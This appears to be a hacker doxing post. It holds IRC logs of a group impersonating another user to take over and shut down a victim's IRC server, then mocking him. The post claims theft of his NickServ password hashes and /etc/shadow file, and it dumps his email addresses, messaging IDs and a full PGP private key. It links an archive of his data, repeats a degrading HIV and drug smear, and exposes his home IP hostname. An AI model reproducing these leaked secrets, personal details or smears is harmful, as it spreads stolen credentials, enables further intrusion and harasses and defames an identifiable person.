aaaaaaaaaaacomü% -=== /!\ WARNING 0DAY DEV NOTES JUST RELEASED!! /!\ =======- -=== /!\ GMAIL HACKER: CONFIRMED ETHICS BREACH! /!\ =======- Starfall can u google how to backup .db files from here while i set modes rsync? -OperServ- Unknown command rsync. "/msg OperServ HELP" for help. ... im gonna just act like that didnt happen everybody here is tired nobody saw that -==========================================================- -=== Exhibit C: /die /die /die my darlin ==================- -==========================================================- MellyEL8 posing as nachash in #opers on new network, dropping knowledge about 3 day old public exploit that hann just learned about, he asks how nachash knows? ... hann reads comics. HANN SHIVERS HIS OWN TIMBERS HKEKEKKEKEKEkkekEKk < Global> ChanServ: marc!marc@pool-108-56-251-199.washdc.fios.verizon.net (level 10000) set access level 9 to chF (group chF) on channel #sevens < Global> ChanServ: marc!marc@pool-108-56-251-199.washdc.fios.verizon.net (level 10000) set access level 10 to chF (group chF) on channel #sevens < marc> ok nice < marc> ugh im getting < marc> too good @ this < marc> ircd backed up < marc> | wind < marc> kms sent me like < marc> 100 msgs last night < marc> iw as afk < marc> something about a POC for a grsec bypass < marc> if i read it right < marc> which is huge < Global> NickServ: wind!wind@localhost (e-mail: none) changed its password. < marc> | wind /hs on < marc> and /cycle in chans < marc> if u woul < marc> i like that vhost lol < wind> | it's probably the local 3.4 < wind> | that has no protections at all < marc> mayb < wind> | so there's nothing to bypass < marc> If you're running Linux 3.4 or newer and enabled < marc> CONFIG_X86_X32 , you need to disable it or update < marc> immediately; upstream vuln CVE-2014-0038 < marc> It doesn't get any more serious, nearly an arbitrary write which nothing (including grsecurity) will < marc> prevent exploitation of < marc> To give you an idea of the level of testing that went into X32 support, a syscall fuzzer trying random < marc> syscall numbers could have found this < marc> Yet it sat in the kernel for over a year and a half < marc> I would not be surprised to see an exploit for this within the next few days < marc> <@grsecurity> @awasi1001 Our latest test patch uploaded today contains the fix. The stable 3.2 tree is not affected. < marc> < marc> In case there's confusion, this vuln is not about 32bit userland on 64bit (CONFIG_X86_32), but the new X32 < wind> | it's just an arbitrary write primitive < wind> | yeah that's the one < wind> | there's already a shit fuck exploit for it < wind> | that barely compiles and takes 13 minutes to root < marc> who told u this < wind> | it's public knowledge < marc> | wind im reading comics < marc> got an awesome comic reader with .cbr files After hann got nulled by zee, he moved his irc to a new joint where we had onion access too (everyone else was connecting from a znc to a clearnet IP pool-108-56-251-199.washdc.fios.verizon.net). Anxious to get rid of the cretinous bottom feeder and be done with it, we made one final play: /nick'd up as our true selves [Lord]IntangirTheGod and hit the default kill switch "/die die-you-stupid" (fantastic administration, hann): = --- | You're now known as [Lord]IntangirTheGod = <~[Lord]IntangirTheGod> SHOUTS TO THE SILVERLORDS MOTHER FUCKERS = <~[Lord]IntangirTheGod> SHOUTS TO ELLYEL8 AND MELLYEL8 = <~[Lord]IntangirTheGod> In 2013, hann started telling close friends that he's been infected with [[GRIDS]] ever since the first time he tried heroin. Once this story inevitably spread, he changed his story by saying that he lied about having AIDS in order to gain sympathy and pandhandle money from these friends, because he's a shameless junkie piece of shit. It was originally proposed as a thought experiment that much like Schrodinger's Cat, hann could be thought to both be HIV positive and negative at the same time. It was later determined by a panel of duly elected dramacrats that actual infection by a retrovirus is irrelevant in hann's case - he has AIDS. = <~[Lord]IntangirTheGod> THERE'S A MESSAGE FROM THE REAL NACHASH TO YOU, MARC = <~[Lord]IntangirTheGod> bam bam bamBAM BAM! = <~marc> lol not funny = <~marc> scared me = <~[Lord]IntangirTheGod> AND YOU'RE = <~[Lord]IntangirTheGod> GONE = <~marc> chf Too late, hann, /die die-you-stupid was already sent. Your irc was delinked and you melted down, fucking hard: z: new fingerprint: D81F27FA 3B4EA990 0F0D1B29 52CBDE40 34066216 z: conversation is now off the record (untrusted!) z hey nac z you there, need to talk to you wind Hey z hey z sorry z irc z nachash z wtf is that about? z why'd you jupe the server? z wtf? z did someone hack your client? z something wrong? z what is that about dude? wind LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL wind yes hello wind IntangirTheGod here z wtf wind World's greatest nachash impersonator z uh what z ? z nac stop fucking around z wtf is all this about? wind hann status: brutally fucked with a rake by the almighty SilverLords z are u high wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind imgay wind How does it feel wind to be stepped on like an insect wind by the world's greatest social engineer? wind tl;dr wind you got played like a cheap instrument wind from day 1 kiddo wind Is your face getting hot right about now? wind Nice to know what you really thought about me, btw z what? wind You could barely contain your enthusiasm for shit talking me as soon as you thought that I got owned z i dont have time for this wind I guess wind I need to spell it out z omg really i said all the things wind I'm Intangir, you doofus z i said to you in your face actually z if this is even not a sorry troll wind You're not good enough to scrape gum off of the real nachash's shoes z a lot of things didnt add up but i certainly wouldnt call pretending to be someone wind When you came back, he told me if I wanted to have a bit of fun wind to poke and prod you at will z and getting literally nothing but a server jupe out of it wind Oh, I got a bit more than that z ok well have fun lol wind btw z i have a lot more important things to deal with wind I rather enjoyed wind all the sha1s z if anything u just saw that i said the same things to him wind from your nickserv db z as i said to you z ok lol z a ns db? z cmon kid z this is depressing z go somewhere lol wind That's just the tip of the iceberg z that was pathetic z rip nachash z ok enjoy yaself young wind got that /etc/shadow from the old box too z oh wow z that will really z get u far wind btw wind in case of paste failure <-- z (z@zauris.ru) has quit (Leaving...) wind In 2013, hann started telling close friends that he's been infected with [[GRIDS]] ever since the first time he tried heroin. Once this story inevitably spread, he changed his story by saying that he lied about having AIDS in order to gain sympathy and pandhandle money from these friends, because he's a shameless junkie piece of shit. It was originally proposed as a thought experiment that much like wind Schrodinger's Cat, hann could be thought to both be HIV positive and negative at the same time. It was later determined by a panel of duly elected dramacrats that actual infection by a retrovirus is irrelevant in hann's case - he has AIDS. -- [z] is away: Offline wind LOOOOOOOOOOOOL -==========================================================- -=== Epilogue: Less is more. More is more. ================- -==========================================================- And in conclusion, Michael's autism knows know bounds (this one is for you, NSA)! $ curl http://chf.re/marc.txt marcdoubt@Safe-mail.net BM-2cV6MTUSwX5srezWyHoJDJcJE8ZhbN89Vy@bitmessage.ch BM-2cU8XpE6e7GD8iTXzNRw9PyGWxWzwrufDp -----BEGIN PGP PRIVATE KEY BLOCK----- Version: GnuPG v1.4.11 (GNU/Linux) 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 =2DDf -----END PGP PRIVATE KEY BLOCK----- All of the data recovered from his boxes (and more!) can be found at: http://doxbinicsjqqmohl.onion/media/Hann_Wars_IV_-_A_New_Hope.tgz